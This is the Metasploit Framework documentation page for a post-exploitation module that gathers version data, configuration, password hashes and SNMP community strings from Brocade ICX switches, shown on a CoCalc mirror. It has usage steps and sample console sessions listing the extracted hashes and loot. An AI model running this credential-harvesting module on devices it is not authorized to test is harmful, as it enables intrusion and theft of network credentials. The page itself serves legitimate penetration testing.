CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/post/networking/gather/enum_brocade.md
Views: 1904

Vulnerable Application

This module has been tested on the following hardware/OS combinations.

  • Brocade ICX 6430-24

    • Firmware: 08.0.20T311

The ICX config can be found no passwords, hashes

This module will look for the following parameters which contain credentials:

  • FastIron

    • show configuration

!!! keep in mind 'password-display' http://wwwaem.brocade.com/content/html/en/command-reference-guide/fastiron-08040-commandref/GUID-169889CD-1A74-4A23-AC78-38796692374F.html !!! need to be able to give a password to enable

  • super-user-password

  • username

  • SNMP

Verification Steps

  1. Start msfconsole

  2. Get a shell

  3. Do: use post/networking/gather/enum_brocade

  4. Do: set session [id]

  5. Do: set verbose true

  6. Do: run

Options

Scenarios

ICX 6430-24, FastIron 08.0.20T311

SSH Session with password-display off

resource (brocade.rb)> use post/networking/gather/enum_brocade
resource (brocade.rb)> set session 1
session => 1
resource (brocade.rb)> set verbose true
verbose => true
resource (brocade.rb)> run
[*] In a non-enabled cli
[*] Getting version information
[*] OS: 08.0.30hT311
[+] Version information stored in to loot /root/.msf4/loot/20190601203656_default_10.0.4.51_brocade.version_751557.txt
[*] Gathering info from show configuration
[!] password-display is disabled, no password hashes displayed in config
[*] Post module execution completed

SSH Session with Enable run

resource (brocade.rb)> use post/networking/gather/enum_brocade
resource (brocade.rb)> set session 1
session => 1
resource (brocade.rb)> set verbose true
verbose => true
resource (brocade.rb)> run
[*] In an enabled cli
[*] Getting version information
[*] OS: 08.0.30hT311
[+] Version information stored in to loot /root/.msf4/loot/20190601221921_default_10.0.4.51_brocade.version_839783.txt
[*] Gathering info from show configuration
[+] password-display is enabled, hashes will be displayed in config
[+] enable password hash $1$QP3H93Wm$uxYAs2HmAK0lQiP3ig5tm.
[+] User brocade of type 8 found with password hash $1$f/uxhovU$dST5lNskZCPQe/5QijULi0.
[+] ENCRYPTED SNMP community $MlVzZCFAbg== with permissions ro
[+] ENCRYPTED SNMP community $U2kyXj1k with permissions rw
[*] Post module execution completed
msf5 post(networking/gather/enum_brocade) > loot

Loot
====

host       service  type             name         content     info                   path
----       -------  ----             ----         -------     ----                   ----
10.0.4.51           brocade.version  version.txt  text/plain  Brocade Version        /root/.msf4/loot/20190601221959_default_10.0.4.51_brocade.version_003751.txt
10.0.4.51           brocade.config   config.txt   text/plain  Brocade Configuration  /root/.msf4/loot/20190601222004_default_10.0.4.51_brocade.config_998514.txt

msf5 post(networking/gather/enum_brocade) > creds
Credentials
===========

host       origin     service         public   private                             realm  private_type
----       ------     -------         ------   -------                             -----  ------------
10.0.4.51  10.0.4.51  22/tcp          enable   $1$QP3H93Wm$uxYAs2HmAK0lQiP3ig5tm.         Nonreplayable hash
10.0.4.51  10.0.4.51  161/udp (snmp)           $MlVzZCFAbg==                              Nonreplayable hash
10.0.4.51  10.0.4.51  161/udp (snmp)           $U2kyXj1k                                  Nonreplayable hash
10.0.4.51  10.0.4.51  22/tcp          brocade  $1$f/uxhovU$dST5lNskZCPQe/5QijULi0         Nonreplayable hash